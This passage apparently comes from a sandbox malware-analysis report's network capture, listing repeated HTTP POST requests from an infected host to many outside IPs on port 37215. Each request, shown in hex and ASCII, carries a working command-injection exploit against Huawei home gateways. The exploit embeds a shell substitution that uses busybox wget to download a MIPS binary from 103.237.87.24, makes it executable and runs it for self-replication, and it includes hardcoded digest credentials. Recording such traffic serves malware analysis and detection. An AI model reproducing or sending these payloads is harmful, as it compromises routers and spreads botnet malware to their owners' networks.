20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2111192.168.2.1349888157.249.72.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.584460020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2112192.168.2.1352262197.4.61.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.584481955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2113192.168.2.134491241.52.16.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.584773064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2114192.168.2.1339224157.85.179.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.584810972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2115192.168.2.1357970197.17.234.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.584878922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2116192.168.2.1339828217.17.4.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.584899902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2117192.168.2.1341666197.138.223.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.584985971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2118192.168.2.1357896148.1.44.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585000038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2119192.168.2.1355150157.241.143.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585027933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2120192.168.2.1335570197.152.41.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585031986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2121192.168.2.1350800157.84.69.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585083961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
